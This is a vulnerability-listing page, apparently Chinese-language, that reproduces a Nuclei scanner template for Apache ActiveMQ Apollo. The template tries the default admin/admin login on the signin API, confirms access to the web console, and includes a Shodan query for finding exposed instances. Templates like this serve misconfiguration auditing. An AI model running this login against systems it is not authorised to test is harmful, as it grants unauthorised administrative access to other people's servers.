apache-apollo-default-login: Apache Apollo - Default Login

日期: 2025-08-01 | 影响软件: Apache Apollo | POC: 已公开

漏洞描述

PoC代码[已公开]

id: apache-apollo-default-login

info:
  name: Apache Apollo - Default Login
  author: ritikchaddha
  severity: high
  classification:
    cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: activemq_apollo
    shodan-query: title:"Apache Apollo"
  tags: apache,apollo,default-login,misconfig,vuln
variables:
  username: 'admin'
  password: 'admin'

http:
  - raw:
      - |
        POST /api/json/session/signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}
      - |
        GET /console/index.html HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_1
        regex:
          - '^\s*true\s*$'

      - type: word
        part: body_2
        words:
          - '<strong>Log Details:'
          - 'Store Status'
          - 'Logout</a>'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100db819a177c16db07e25fc3f5762ce9dfa4c60e3a7029735f40e5f68ccb1c032502206d0d6b689d6136401372180aa94f09bbcd7cd275207a8d2a369bb5cbd9134849:922c64590222798bb761d5b6d8e72950